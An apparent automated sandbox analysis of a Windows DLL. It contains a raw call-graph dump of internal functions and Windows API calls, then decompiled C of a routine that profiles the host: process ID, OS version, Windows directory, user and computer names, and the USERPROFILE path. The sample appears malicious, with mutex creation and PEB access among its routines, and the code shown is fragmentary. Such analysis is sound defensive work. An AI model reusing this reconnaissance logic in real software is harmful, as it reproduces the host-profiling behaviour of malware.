12763->12765 12766 10002c7f 12764->12766 12771 10002c23 12765->12771 12772 10002c2c 12765->12772 12767 10002c84 12766->12767 12768 10002cce 12766->12768 12888 10009fb0 memset memset 12767->12888 12770 10002ba8 4 API calls 12768->12770 12779 10002c6a 12770->12779 12881 10002ba8 12771->12881 12776 100016ec 2 API calls 12772->12776 12773 10002c8f 12775 100016ec 2 API calls 12773->12775 12777 10002c99 12775->12777 12778 10002c36 12776->12778 12780 100099ec 2 API calls 12777->12780 12781 100099ec 2 API calls 12778->12781 12783 10002ce3 CreateDirectoryW 12779->12783 12791 10001c18 12779->12791 12784 10002cbe 12780->12784 12785 10002c53 12781->12785 12782 10009e2e 2 API calls 12782->12779 12786 10002cef 12783->12786 12787 10009e2e 2 API calls 12784->12787 12788 10009e2e 2 API calls 12785->12788 12789 10009203 2 API calls 12786->12789 12786->12791 12787->12779 12790 10002c28 12788->12790 12789->12791 12790->12782 12791->12685 12791->12710 12793 1000af92 12792->12793 12794 1000b128 6 API calls 12793->12794 12795 10001c97 12794->12795 12795->12695 12797 1000af2b 6 API calls 12796->12797 12798 10001cb4 12797->12798 12798->12699 12799 1000b4fe 12798->12799 12800 1000b568 12799->12800 12803 1000b50f 12799->12803 12800->12699 12801 1000aedb 4 API calls 12801->12803 12802 1000b533 GetLastError 12802->12803 12803->12800 12803->12801 12803->12802 12804 1000af59 6 API calls 12803->12804 12805 1000af7e 6 API calls 12803->12805 12804->12803 12805->12803 12807 1000c3e7 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 12806->12807 12807->12704 12809 1000b128 6 API calls 12808->12809 12810 10001cea 12809->12810 12810->12708 12811 1001163b 12810->12811 12812 1001164d 12811->12812 12813 10009252 RtlAllocateHeap 12812->12813 12820 10011657 12812->12820 12814 10011667 12813->12814 12815 1000ea03 lstrlenW 12814->12815 12814->12820 12816 1001167e 12815->12816 12817 100116b8 12816->12817 12819 1000cbc8 6 API calls 12816->12819 12818 10009203 2 API calls 12817->12818 12818->12820 12821 100116ab 12819->12821 12820->12708 12821->12817 12892 1001135d 12821->12892 12824 1000cbd8 12823->12824 12843 1000cc1c 12823->12843 12825 100091e7 RtlAllocateHeap 12824->12825 12826 1000cbe2 12825->12826 12827 1000ccc1 12826->12827 12828 1000cbf4 12826->12828 12826->12843 12831 100099ec 2 API calls 12827->12831 12829 100091b2 2 API calls 12828->12829 12830 1000cbfe 12829->12830 12832 1000cc26 12830->12832 12833 1000cc08 12830->12833 12831->12843 12835 1000cc52 12832->12835 12836 1000cc2d 12832->12836 12834 10009e2e 2 API calls 12833->12834 12838 1000cc11 12834->12838 12837 100091b2 2 API calls 12835->12837 12839 100098c2 2 API calls 12836->12839 12840 1000cc5c 12837->12840 12841 10009203 2 API calls 12838->12841 12846 1000cc32 12839->12846 12842 1000984f RtlAllocateHeap 12840->12842 12841->12843 12844 1000cc66 12842->12844 12843->12710 12845 10009e2e 2 API calls 12844->12845 12847 1000cc74 12845->12847 12848 100099ec 2 API calls 12846->12848 12847->12846 12849 1000cc7a 12847->12849 12850 1000cca6 12848->12850 12851 10009203 2 API calls 12849->12851 12852 10009e2e 2 API calls 12850->12852 12854 1000cc85 12851->12854 12853 1000ccb4 12852->12853 12855 10009e2e 2 API calls 12853->12855 12856 10009203 2 API calls 12854->12856 12855->12843 12856->12843 12858 10010177 12857->12858 12859 100091e7 RtlAllocateHeap 12858->12859 12860 10002b4d 12858->12860 12861 100101a7 12859->12861 12860->12736 12861->12860 12862 10009203 2 API calls 12861->12862 12862->12860 12864 1000c08f 7 API calls 12863->12864 12865 1000e43e 12864->12865 12866 10009192 2 API calls 12865->12866 12867 1000e448 12866->12867 12868 10009999 2 API calls 12867->12868 12869 1000e457 12868->12869 12870 10009e14 2 API calls 12869->12870 12871 10001ae7 12870->12871 12871->12743 12871->12745 12873 10009192 2 API calls 12872->12873 12874 1000d0a0 12873->12874 12875 10014c3a 2 API calls 12874->12875 12880 1000d0d6 12875->12880 12876 1000d11a 12877 10009e14 2 API calls 12876->12877 12878 1000d129 12877->12878 12878->12760 12879 10014c3a 2 API calls 12879->12880 12880->12876 12880->12879 12882 100016ec 2 API calls 12881->12882 12883 10002bb7 12882->12883 12884 1000984f RtlAllocateHeap 12883->12884 12885 10002bc1 12884->12885 12886 10009e2e 2 API calls 12885->12886 12887 10002bcc 12886->12887 12887->12790 12889 1000a000 12888->12889 12890 1000dc3c 4 API calls 12889->12890 12891 1000a005 12890->12891 12891->12773 12893 10011377 12892->12893 12894 100113fb 12892->12894 12895 100016ec 2 API calls 12893->12895 12896 100091b2 2 API calls 12894->12896 12897 10011383 12895->12897 12898 10011405 12896->12898 12899 100091e7 RtlAllocateHeap 12897->12899 12921 1000cce7 12898->12921 12901 10011391 12899->12901 12903 10014c3a 2 API calls 12901->12903 12905 100113ab 12903->12905 12904 10009e2e 2 API calls 12907 10011421 12904->12907 12906 1000c172 2 API calls 12905->12906 12908 100113bd 12906->12908 12909 10009203 2 API calls 12907->12909 12911 1000c493 2 API calls 12908->12911 12910 100113f4 12909->12910 12910->12817 12912 100113ce 12911->12912 12913 10009e2e 2 API calls 12912->12913 12914 100113e1 12913->12914 12918 1000af40 12914->12918 12917 10009203 2 API calls 12917->12910 12930 1000af11 12918->12930 12922 100091e7 RtlAllocateHeap 12921->12922 12923 1000ccf7 12922->12923 12929 1000cd01 12923->12929 12933 1000970c 12923->12933 12928 10009203 2 API calls 12928->12929 12929->12904 12931 1000af2b 6 API calls 12930->12931 12932 1000af27 12931->12932 12932->12917 12934 1000967b 2 API calls 12933->12934 12935 10009723 12934->12935 12936 100103db 12935->12936 12937 100103ec 12936->12937 12940 100101ff 12937->12940 12941 1000cd2a 12940->12941 12942 10010219 12940->12942 12941->12928 12942->12941 12943 100091b2 RtlAllocateHeap GetNumberFormatA 12942->12943 12944 10010264 12943->12944 12945 100091e7 RtlAllocateHeap 12944->12945 12946 100102b0 12945->12946 12947 100102b9 12946->12947 12948 100102cb 12946->12948 12949 10009e2e HeapFree memset 12947->12949 12950 100091b2 RtlAllocateHeap GetNumberFormatA 12948->12950 12949->12941 12951 100102d5 12950->12951 12952 1000c172 memset _vsnwprintf 12951->12952 12953 100102ef 12952->12953 12954 1000c172 memset _vsnwprintf 12953->12954 12962 10010335 12953->12962 12956 10010314 12954->12956 12955 10009203 HeapFree memset 12957 1001035b 12955->12957 12960 1000c493 memset GetExitCodeProcess 12956->12960 12958 10009e2e HeapFree memset 12957->12958 12959 10010364 12958->12959 12961 10009e2e HeapFree memset 12959->12961 12960->12962 12961->12941 12962->12955 12966 1000e549 12963->12966 12964 1000e54d 12964->12714 12964->12715 12965 100091e7 RtlAllocateHeap 12965->12966 12966->12964 12966->12965 12968 100091e7 RtlAllocateHeap 12967->12968 12969 1000cd8e 12968->12969 12970 1000ceff 12969->12970 12971 100091e7 RtlAllocateHeap 12969->12971 12970->12269 12973 1000cda8 12971->12973 12972 1000ce0e 12974 10009203 2 API calls 12972->12974 12973->12970 12973->12972 12977 1000936a memset 12973->12977 12978 1000a14f 11 API calls 12973->12978 12975 1000cef1 12974->12975 12976 10009203 2 API calls 12975->12976 12976->12970 12977->12973 12978->12973 12988 1000ae56 12979->12988 12983 1000b2bd 12982->12983 12984 1000aaab RtlAllocateHeap 12983->12984 12986 1000b2e5 12984->12986 12985 1000b34a 12985->12283 12986->12985 12987 10009203 2 API calls 12986->12987 12987->12985 12989 1000affb 4 API calls 12988->12989 12990 1000ae75 12989->12990 12991 1000ae53 12990->12991 12992 10009203 2 API calls 12990->12992 12991->12273 12991->12284 12992->12991 12994 1000ae47 4 API calls 12993->12994 12995 1000225c 12994->12995 12996 10002267 12995->12996 12998 1000278b 3 API calls 12995->12998 13034 1000118f 12996->13034 13035 1000f6ad 12996->13035 12998->12996 13000 1000af40 6 API calls 13001 10002282 13000->13001 13040 1000eeb3 13001->13040 13004 1000c08f 7 API calls 13005 100022a0 13004->13005 13005->13034 13047 1000eb0a 13005->13047 13009 100022d9 13010 10002313 13009->13010 13011 10009559 8 API calls 13009->13011 13065 1000363a CreateMutexW 13010->13065 13013 100022fb 13011->13013 13013->13010 13016 1000ec07 6 API calls 13013->13016 13015 1000ec07 6 API calls 13017 10002328 13015->13017 13016->13010 13080 10002ead 13017->13080 13025 1000233e 13026 1000c3b5 GetSystemTimeAsFileTime 13025->13026 13028 1000236c 13025->13028 13121 10002ee8 13025->13121 13026->13025 13130 10004f45 13028->13130 13034->11815 13036 1000c3b5 GetSystemTimeAsFileTime 13035->13036 13037 1000f6b8 13036->13037 13038 1000af11 6 API calls 13037->13038 13039 10002270 13038->13039 13039->13000 13041 10009559 8 API calls 13040->13041 13042 1000eec5 13041->13042 13043 10009559 8 API calls 13042->13043 13044 1000eede 13043->13044 13146 1000ee3f 13044->13146 13046 10002289 13046->13004 13048 1000eb1b 13047->13048 13049 100022cb 13048->13049 13050 100091e7 RtlAllocateHeap 13048->13050 13051 1000ec07 13049->13051 13050->13049 13053 1000ec25 13051->13053 13052 1000ec7d 13054 100091e7 RtlAllocateHeap 13052->13054 13055 1000ec8e 13052->13055 13053->13052 13061 1000ec29 13053->13061 13159 1000eb5d 13053->13159 13054->13055 13056 1000e920 2 API calls 13055->13056 13055->13061 13058 1000ecf3 13056->13058 13059 1000ed69 SetThreadPriority 13058->13059 13060 1000ed2e 13058->13060 13059->13061 13062 1000ed52 13060->13062 13063 10009203 2 API calls 13060->13063 13061->13009 13064 1000936a memset 13062->13064 13063->13062 13064->13061 13066 10003653 CreateMutexW 13065->13066 13076 1000231a 13065->13076 13067 10003665 13066->13067 13066->13076 13068 100016d2 2 API calls 13067->13068 13069 1000366f 13068->13069 13070 1000980b RtlAllocateHeap 13069->13070 13069->13076 13071 1000367d 13070->13071 13072 10009e14 2 API calls 13071->13072 13073 1000368b 13072->13073 13074 100091e7 RtlAllocateHeap 13073->13074 13075 10003695 13074->13075 13075->13076 13077 100091e7 RtlAllocateHeap 13075->13077 13076->13015 13078 100036b8 13077->13078 13078->13076 13165 10007a2d 13078->13165 13081 1000232f 13080->13081 13082 10002ebb 13080->13082 13084 10005a78 13081->13084 13169 1000de25 13082->13169 13085 1000e42c 8 API calls 13084->13085 13086 10005a93 13085->13086 13087 10002334 13086->13087 13088 100091e7 RtlAllocateHeap 13086->13088 13097 100030de 13087->13097 13089 10005ab0 13088->13089 13096 10005aba 13089->13096 13176 1000e1a0 13089->13176 13091 10009203 2 API calls 13091->13087 13095 1000ec07 6 API calls 13095->13096 13096->13091 13098 1000ae47 4 API calls 13097->13098 13099 100030fc 13098->13099 13189 10003028 13099->13189 13102 10003028 3 API calls 13103 10003126 13102->13103 13193 1000ae93 13103->13193 13106 10002339 13114 10004dbd 13106->13114 13107 10009ac5 RtlAllocateHeap 13108 10003149 13107->13108 13109 10003165 13108->13109 13196 10003181 13108->13196 13111 10009bbe 2 API calls 13109->13111 13112 10003170 13111->13112 13113 10009203 2 API calls 13112->13113 13113->13106 13203 10005368 13114->13203 13116 10004de0 13117 10004deb 13116->13117 13118 10004e4d 13116->13118 13223 10004972 13116->13223 13117->13025 13268 100048a6 13118->13268 13122 10003023 13121->13122 13123 10002f1d 13121->13123 13122->13025 13123->13122 13124 1000301a 13123->13124 13128 100091e7 RtlAllocateHeap 13123->13128 13129 10009203 2 API calls 13123->13129 13304 1000b353 13123->13304 13309 10005e24 13123->13309 13124->13122 13313 10003218 13124->13313 13128->13123 13129->13123 13131 10004f53 13130->13131 13132 10004f81 13131->13132 13334 10004e5f 13131->13334 13133 10009203 2 API calls 13132->13133 13135 10002371 13133->13135 13136 1000edf7 13135->13136 13137 1000edfd 13136->13137 13139 1000ee1b 13137->13139 13348 1000eda3 13137->13348 13140 10009203 2 API calls 13139->13140 13141 10002376 13140->13141 13142 10005de9 13141->13142 13143 10005df2 13142->13143 13144 10005e17 13143->13144 13145 10009203 2 API calls 13143->13145 13144->13034 13145->13144 13147 1000ee89 13146->13147 13148 1000ee4d 13146->13148 13149 10009192 2 API calls 13147->13149 13150 100091e7 RtlAllocateHeap 13148->13150 13151 1000ee93 13149->13151 13152 1000ee5e 13150->13152 13153 1000980b RtlAllocateHeap 13151->13153 13155 1000eeac 13152->13155 13157 10009203 2 API calls 13152->13157 13154 1000ee9e 13153->13154 13156 10009e14 2 API calls 13154->13156 13155->13046 13156->13155 13158 1000ee82 13157->13158 13158->13046 13160 1000eb67 13159->13160 13161 1000eb8c 13160->13161 13162 10009203 2 API calls 13160->13162 13163 1000eba2 13160->13163 13164 1000936a memset 13161->13164 13162->13161 13163->13053 13164->13163 13166 10007a32 13165->13166 13167 10009559 8 API calls 13166->13167 13168 10007a44 13167->13168 13168->13076 13170 1000de3c 13169->13170 13171 100091b2 2 API calls 13170->13171 13175 1000de5b 13170->13175 13172 1000de6a lstrcmpiW 13171->13172 13173 1000de80 13172->13173 13174 10009e2e 2 API calls 13173->13174 13174->13175 13175->13081 13184 1000e015 13176->13184 13179 1000df7f 13180 100091b2 2 API calls 13179->13180 13183 1000dfa5 13180->13183 13181 10009e2e 2 API calls 13182 10005b14 13181->13182 13182->13095 13183->13181 13185 1000936a memset 13184->13185 13186 1000e04c 13185->13186 13187 10005ac6 13186->13187 13188 1000e106 LocalAlloc 13186->13188 13187->13096 13187->13179 13188->13187 13190 10003032 13189->13190 13192 10003049 13189->13192 13191 10009281 3 API calls 13190->13191 13191->13192 13192->13102 13200 1000ae9d 13193->13200 13197 1000318d 13196->13197 13198 10003198 atol 13197->13198 13199 10003193 13197->13199 13198->13199 13199->13108 13201 1000affb 4 API calls 13200->13201 13202 10003131 13201->13202 13202->13106 13202->13107 13204 1000538a 13203->13204 13274 10004811 13204->13274 13207 1000f9a8 4 API calls 13208 100053b5 13207->13208 13209 1000facb 3 API calls 13208->13209 13213 100053c0 13208->13213 13210 100053dc 13209->13210 13210->13213 13215 100091e7 RtlAllocateHeap 13210->13215 13211 100055c0 13214 10009203 2 API calls 13211->13214 13212 1000fcfb 6 API calls 13212->13211 13213->13211 13213->13212 13216 100055cb 13214->13216 13220 1000542a 13215->13220 13216->13116 13217 1000557f 13217->13213 13219 10009203 2 API calls 13217->13219 13218 10009ac5 RtlAllocateHeap 13218->13220 13219->13213 13220->13213 13220->13217 13220->13218 13221 10009252 RtlAllocateHeap 13220->13221 13222 10009bbe HeapFree memset 13220->13222 13221->13220 13222->13220 13224 1000498c 13223->13224 13280 1001059c 13224->13280 13227 10004a79 13230 1000a650 4 API calls 13227->13230 13228 100049cf 13229 100091e7 RtlAllocateHeap 13228->13229 13231 100049d6 13229->13231 13232 10004a91 13230->13232 13233 100049e0 13231->13233 13234 10004a05 13231->13234 13235 10004a9a 13232->13235 13236 10004abc 13232->13236 13239 10009203 2 API calls 13233->13239 13241 10004a50 13234->13241 13245 10004a6e 13234->13245 13240 10009203 2 API calls 13235->13240 13237 1000ae47 4 API calls 13236->13237 13238 10004ad1 13237->13238 13242 1000a41e 9 API calls 13238->13242 13252 100049a6 13239->13252 13240->13252 13243 10009203 2 API calls 13241->13243 13247 10004af8 13242->13247 13243->13252 13244 1000a455 3 API calls 13253 10004c9e 13244->13253 13246 10009281 3 API calls 13245->13246 13245->13252 13246->13252 13249 1000936a memset 13247->13249 13263 10004b83 13247->13263 13248 10004cc8 13251 10009203 2 API calls 13248->13251 13266 10004b47 13249->13266 13250 10009203 2 API calls 13250->13253 13254 10004cd8 13251->13254 13252->13116 13253->13248 13253->13250 13255 10004ce0 13254->13255 13256 10004d05 13254->13256 13260 10009203 2 API calls 13255->13260 13258 10009203 2 API calls 13256->13258 13257 1000e23e 6 API calls 13257->13266 13258->13245 13259 1000cb78 2 API calls 13259->13266 13260->13252 13261 1000caf3 3 API calls 13261->13266 13262 1000a93e 14 API calls 13262->13266 13263->13244 13264 1000aa38 10 API calls 13264->13266 13266->13257 13266->13259 13266->13261 13266->13262 13266->13263 13266->13264 13267 1000af40 6 API calls 13266->13267 13286 1000490b 13266->13286 13267->13266 13269 100048b7 13268->13269 13270 100048f8 13269->13270 13272 10009203 2 API calls 13269->13272 13271 10009203 2 API calls 13270->13271 13273 10004907 13271->13273 13272->13269 13273->13117 13275 1000483b 13274->13275 13276 1000970c 2 API calls 13275->13276 13277 1000486f 13276->13277 13278 100099ec 2 API calls 13277->13278 13279 1000489b 13278->13279 13279->13207 13281 100105b2 13280->13281 13282 100091e7 RtlAllocateHeap 13281->13282 13284 100105bd 13282->13284 13283 1000499d 13283->13227 13283->13228 13283->13252 13284->13283 13285 1001064c memcpy 13284->13285 13285->13284 13293 10009886 13286->13293 13290 10004941 13291 10009203 2 API calls 13290->13291 13292 10004953 13291->13292 13292->13266 13294 10004929 GetProcessId 13293->13294 13295 1000988f 13293->13295 13299 1000c0e0 13294->13299 13296 100091e7 RtlAllocateHeap 13295->13296 13297 100098a0 13296->13297 13297->13294 13298 100098a7 WideCharToMultiByte 13297->13298 13298->13294 13300 1000c133 2 API calls 13299->13300 13301 1000c106 13300->13301 13302 1000c112 CharUpperBuffA 13301->13302 13303 1000c130 13302->13303 13303->13290 13323 1000adf8 13304->13323 13307 1000c3b5 GetSystemTimeAsFileTime 13308 1000b37b 13307->13308 13308->13123 13310 10005e3b 13309->13310 13311 10005e64 13309->13311 13310->13311 13312 1000ec07 6 API calls 13310->13312 13311->13123 13312->13311 13314 100091e7 RtlAllocateHeap 13313->13314 13318 10003233 13314->13318 13315 100032af 13331 1000af6c 13315->13331 13318->13315 13320 10003265 lstrcatA 13318->13320 13321 1000323d 13318->13321 13322 1000c133 2 API calls 13318->13322 13319 10009203 2 API calls 13319->13321 13320->13318 13321->13122 13322->13318 13326 1000ae02 13323->13326 13327 1000affb 4 API calls 13326->13327 13328 1000ae23 13327->13328 13329 1000ae00 13328->13329 13330 10009203 2 API calls 13328->13330 13329->13307 13329->13308 13330->13329 13332 1000af7e 6 API calls 13331->13332 13333 100032b9 13332->13333 13333->13319 13339 1000438c 13334->13339 13336 10004e80 13336->13131 13337 10009203 2 API calls 13337->13336 13338 10004e76 13338->13336 13338->13337 13340 100091e7 RtlAllocateHeap 13339->13340 13341 10004398 13340->13341 13342 100043a2 13341->13342 13343 100016d2 2 API calls 13341->13343 13342->13338 13344 100043b0 13343->13344 13345 1000c133 2 API calls 13344->13345 13346 100043c6 13345->13346 13347 10009e14 2 API calls 13346->13347 13347->13342 13349 1000edf2 13348->13349 13351 1000edab 13348->13351 13349->13137 13350 1000edba 13350->13137 13351->13350 13352 1000eb5d 2 API calls 13351->13352 13353 1000edee 13352->13353 13353->13137 13354 10001015 13355 1000102b 13354->13355 13368 1000106e 13354->13368 13374 100091d2 HeapCreate 13355->13374 13357 10001030 13375 100095ad 13357->13375 13362 100091b2 2 API calls 13363 10001055 GetFileAttributesW 13362->13363 13364 10001076 13363->13364 13365 10001068 13363->13365 13367 10009e2e 2 API calls 13364->13367 13366 10009e2e 2 API calls 13365->13366 13366->13368 13369 1000107e 13367->13369 13370 10001084 memset memset MultiByteToWideChar 13369->13370 13370->13370 13371 100010e5 13370->13371 13372 10009559 8 API calls 13371->13372 13373 100010f9 GetPEB 13372->13373 13373->13368 13374->13357 13376 100091e7 RtlAllocateHeap 13375->13376 13377 10001035 13376->13377 13378 1001443b 13377->13378 13379 10014453 13378->13379 13380 10009252 RtlAllocateHeap 13379->13380 13381 10001049 13380->13381 13381->13362 14712 100013be 14725 100091d2 HeapCreate 14712->14725 14714 100013ce 14715 100095ad RtlAllocateHeap 14714->14715 14716 100013d3 14715->14716 14717 100015d4 8 API calls 14716->14717 14718 100013dd 14717->14718 14726 1000b986 14718->14726 14722 100013f6 14723 100012f8 72 API calls 14722->14723 14724 100013fb 14723->14724 14725->14714 14727 1000b99d 14726->14727 14728 1000dd17 7 API calls 14727->14728 14729 1000b9a4 14728->14729 14730 1000936a memset 14729->14730 14731 1000b9f3 GetVersionExA GetCurrentProcessId 14730->14731 14732 1000e64f RtlAllocateHeap 14731->14732 14733 1000ba10 14732->14733 14734 1000e68a RtlAllocateHeap 14733->14734 14735 100013e2 14734->14735 14736 1000a916 14735->14736 14737 1000c08f 7 API calls 14736->14737 14738 1000a932 14737->14738 14738->14722

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          C-Code - Quality: 77%
                                                                                                                                                                          			E1000BC31(void* __edx, void* __fp0) {
                                                                                                                                                                          				char _v8;
                                                                                                                                                                          				char _v12;
                                                                                                                                                                          				char _v16;
                                                                                                                                                                          				char _v144;
                                                                                                                                                                          				char _v656;
                                                                                                                                                                          				char _v668;
                                                                                                                                                                          				char _v2644;
                                                                                                                                                                          				void* __esi;
                                                                                                                                                                          				struct _OSVERSIONINFOA* _t70;
                                                                                                                                                                          				intOrPtr _t72;
                                                                                                                                                                          				void* _t73;
                                                                                                                                                                          				intOrPtr _t75;
                                                                                                                                                                          				intOrPtr _t77;
                                                                                                                                                                          				intOrPtr* _t79;
                                                                                                                                                                          				intOrPtr _t81;
                                                                                                                                                                          				intOrPtr _t82;
                                                                                                                                                                          				intOrPtr _t83;
                                                                                                                                                                          				intOrPtr _t89;
                                                                                                                                                                          				intOrPtr _t91;
                                                                                                                                                                          				void* _t92;
                                                                                                                                                                          				intOrPtr _t94;
                                                                                                                                                                          				intOrPtr _t95;
                                                                                                                                                                          				void* _t96;
                                                                                                                                                                          				void* _t100;
                                                                                                                                                                          				intOrPtr _t102;
                                                                                                                                                                          				intOrPtr _t104;
                                                                                                                                                                          				short _t109;
                                                                                                                                                                          				char _t111;
                                                                                                                                                                          				intOrPtr _t116;
                                                                                                                                                                          				intOrPtr _t119;
                                                                                                                                                                          				intOrPtr _t122;
                                                                                                                                                                          				intOrPtr _t126;
                                                                                                                                                                          				intOrPtr _t137;
                                                                                                                                                                          				intOrPtr _t139;
                                                                                                                                                                          				intOrPtr _t141;
                                                                                                                                                                          				intOrPtr _t144;
                                                                                                                                                                          				intOrPtr _t146;
                                                                                                                                                                          				intOrPtr _t152;
                                                                                                                                                                          				void* _t153;
                                                                                                                                                                          				WCHAR* _t154;
                                                                                                                                                                          				char* _t155;
                                                                                                                                                                          				intOrPtr _t166;
                                                                                                                                                                          				intOrPtr _t182;
                                                                                                                                                                          				void* _t198;
                                                                                                                                                                          				struct _OSVERSIONINFOA* _t199;
                                                                                                                                                                          				void* _t200;
                                                                                                                                                                          				void* _t202;
                                                                                                                                                                          				char _t205;
                                                                                                                                                                          				void* _t206;
                                                                                                                                                                          				char* _t207;
                                                                                                                                                                          				void* _t210;
                                                                                                                                                                          				int* _t211;
                                                                                                                                                                          				void* _t224;
                                                                                                                                                                          
                                                                                                                                                                          				_t224 = __fp0;
                                                                                                                                                                          				_t152 =  *0x10020fa8; // 0x10000000
                                                                                                                                                                          				_t70 = E100091E7(0x1ac4);
                                                                                                                                                                          				_t199 = _t70;
                                                                                                                                                                          				if(_t199 != 0) {
                                                                                                                                                                          					 *((intOrPtr*)(_t199 + 0x1640)) = GetCurrentProcessId();
                                                                                                                                                                          					_t72 =  *0x10020fa0; // 0x110f8a0
                                                                                                                                                                          					_t73 =  *((intOrPtr*)(_t72 + 0xb0))(_t200);
                                                                                                                                                                          					_t3 = _t199 + 0x648; // 0x648
                                                                                                                                                                          					E10014B0E( *((intOrPtr*)(_t199 + 0x1640)) + _t73, _t3);
                                                                                                                                                                          					_t75 =  *0x10020fa0; // 0x110f8a0
                                                                                                                                                                          					_t5 = _t199 + 0x1644; // 0x1644
                                                                                                                                                                          					_t201 = _t5;
                                                                                                                                                                          					_push(0x105);
                                                                                                                                                                          					_push(_t5);
                                                                                                                                                                          					_push(0);
                                                                                                                                                                          					if( *((intOrPtr*)(_t75 + 0x12c))() != 0) {
                                                                                                                                                                          						 *((intOrPtr*)(_t199 + 0x1854)) = E1000960F(_t201);
                                                                                                                                                                          					}
                                                                                                                                                                          					_t77 =  *0x10020fa0; // 0x110f8a0
                                                                                                                                                                          					_t79 = E1000DD17( *((intOrPtr*)(_t77 + 0x130))()); // executed
                                                                                                                                                                          					 *((intOrPtr*)(_t199 + 0x110)) = _t79;
                                                                                                                                                                          					_t163 =  *_t79;
                                                                                                                                                                          					if(E1000DE92( *_t79) == 0) {
                                                                                                                                                                          						_t81 = E1000DD67(_t163, _t201); // executed
                                                                                                                                                                          						__eflags = _t81;
                                                                                                                                                                          						_t166 = (0 | _t81 > 0x00000000) + 1;
                                                                                                                                                                          						__eflags = _t166;
                                                                                                                                                                          						 *((intOrPtr*)(_t199 + 0x214)) = _t166;
                                                                                                                                                                          					} else {
                                                                                                                                                                          						 *((intOrPtr*)(_t199 + 0x214)) = 3;
                                                                                                                                                                          					}
                                                                                                                                                                          					_t14 = _t199 + 0x220; // 0x220, executed
                                                                                                                                                                          					_t82 = E1000E68A(_t14); // executed
                                                                                                                                                                          					 *((intOrPtr*)(_t199 + 0x218)) = _t82;
                                                                                                                                                                          					_t83 = E1000E64F(_t14); // executed
                                                                                                                                                                          					 *((intOrPtr*)(_t199 + 0x21c)) = _t83;
                                                                                                                                                                          					_t17 = _t199 + 0x114; // 0x114
                                                                                                                                                                          					_t202 = _t17;
                                                                                                                                                                          					 *((intOrPtr*)(_t199 + 0x224)) = _t152;
                                                                                                                                                                          					_push( &_v16);
                                                                                                                                                                          					_v12 = 0x80;
                                                                                                                                                                          					_push( &_v8);
                                                                                                                                                                          					_v8 = 0x100;
                                                                                                                                                                          					_push( &_v656);
                                                                                                                                                                          					_push( &_v12);
                                                                                                                                                                          					_push(_t202);
                                                                                                                                                                          					_push( *((intOrPtr*)( *((intOrPtr*)(_t199 + 0x110)))));
                                                                                                                                                                          					_t89 =  *0x10020fc8; // 0x110fb00
                                                                                                                                                                          					_push(0); // executed
                                                                                                                                                                          					if( *((intOrPtr*)(_t89 + 0x6c))() == 0) {
                                                                                                                                                                          						GetLastError();
                                                                                                                                                                          					}
                                                                                                                                                                          					_t91 =  *0x10020fc0; // 0x110fa38
                                                                                                                                                                          					_t92 =  *((intOrPtr*)(_t91 + 0x3c))(0x1000);
                                                                                                                                                                          					_t28 = _t199 + 0x228; // 0x228
                                                                                                                                                                          					_t153 = _t28;
                                                                                                                                                                          					 *(_t199 + 0x1850) = 0 | _t92 > 0x00000000;
                                                                                                                                                                          					if( *0x10020fa4 != 2) {
                                                                                                                                                                          						E1000BB3A( *((intOrPtr*)(_t199 + 0x224)), _t153);
                                                                                                                                                                          					} else {
                                                                                                                                                                          						E1000BC04(_t153);
                                                                                                                                                                          					}
                                                                                                                                                                          					_t94 =  *0x10020fa4; // 0x1
                                                                                                                                                                          					 *((intOrPtr*)(_t199 + 0xa0)) = _t94;
                                                                                                                                                                          					_t219 = _t153;
                                                                                                                                                                          					if(_t153 != 0) {
                                                                                                                                                                          						 *((intOrPtr*)(_t199 + 0x434)) = E1000960F(_t153);
                                                                                                                                                                          					}
                                                                                                                                                                          					_t95 = E1000D214();
                                                                                                                                                                          					_t35 = _t199 + 0xb0; // 0xb0
                                                                                                                                                                          					_t203 = _t35;
                                                                                                                                                                          					 *((intOrPtr*)(_t199 + 0xac)) = _t95;
                                                                                                                                                                          					_t96 = E1000D001(_t35, _t219, _t224);
                                                                                                                                                                          					_t37 = _t199 + 0xd0; // 0xd0
                                                                                                                                                                          					E10009971(_t96, _t35, _t37);
                                                                                                                                                                          					_t38 = _t199 + 0x438; // 0x438
                                                                                                                                                                          					E10009626(_t153, _t38);
                                                                                                                                                                          					_t100 = E1000E6E9(_t203, E1000CF09(_t35), 0);
                                                                                                                                                                          					_t39 = _t199 + 0x100c; // 0x100c
                                                                                                                                                                          					E1000D22A(_t100, _t39, _t224);
                                                                                                                                                                          					_t102 =  *0x10020fa0; // 0x110f8a0
                                                                                                                                                                          					_t104 = E1000DEE4( *((intOrPtr*)(_t102 + 0x130))(_t202)); // executed
                                                                                                                                                                          					 *((intOrPtr*)(_t199 + 0x101c)) = _t104;
                                                                                                                                                                          					E1000936A(_t199, 0, 0x9c);
                                                                                                                                                                          					_t211 = _t210 + 0xc;
                                                                                                                                                                          					_t199->dwOSVersionInfoSize = 0x9c;
                                                                                                                                                                          					GetVersionExA(_t199);
                                                                                                                                                                          					 *((intOrPtr*)(_t199 + 0xa8)) = E1000B93E(_t103);
                                                                                                                                                                          					_t109 = E1000B967(_t108);
                                                                                                                                                                          					_t43 = _t199 + 0x1020; // 0x1020
                                                                                                                                                                          					_t154 = _t43;
                                                                                                                                                                          					 *((short*)(_t199 + 0x9c)) = _t109;
                                                                                                                                                                          					GetWindowsDirectoryW(_t154, 0x104);
                                                                                                                                                                          					_t111 = E100091B2(_t108, 0x83);
                                                                                                                                                                          					_t182 =  *0x10020fa0; // 0x110f8a0
                                                                                                                                                                          					_t205 = _t111;
                                                                                                                                                                          					 *_t211 = 0x104;
                                                                                                                                                                          					_push( &_v668);
                                                                                                                                                                          					_push(_t205);
                                                                                                                                                                          					_v8 = _t205;
                                                                                                                                                                          					if( *((intOrPtr*)(_t182 + 0xf0))() == 0) {
                                                                                                                                                                          						_t146 =  *0x10020fa0; // 0x110f8a0
                                                                                                                                                                          						 *((intOrPtr*)(_t146 + 0x10c))(_t205, _t154);
                                                                                                                                                                          					}
                                                                                                                                                                          					E10009E2E( &_v8);
                                                                                                                                                                          					_t116 =  *0x10020fa0; // 0x110f8a0
                                                                                                                                                                          					_t50 = _t199 + 0x1434; // 0x1434
                                                                                                                                                                          					_t206 = _t50;
                                                                                                                                                                          					 *_t211 = 0x209;
                                                                                                                                                                          					_push(_t206);
                                                                                                                                                                          					_push(L"USERPROFILE");
                                                                                                                                                                          					if( *((intOrPtr*)(_t116 + 0xf0))() == 0) {
                                                                                                                                                                          						E1000C172(_t206, 0x105, L"%s\\%s", _t154);
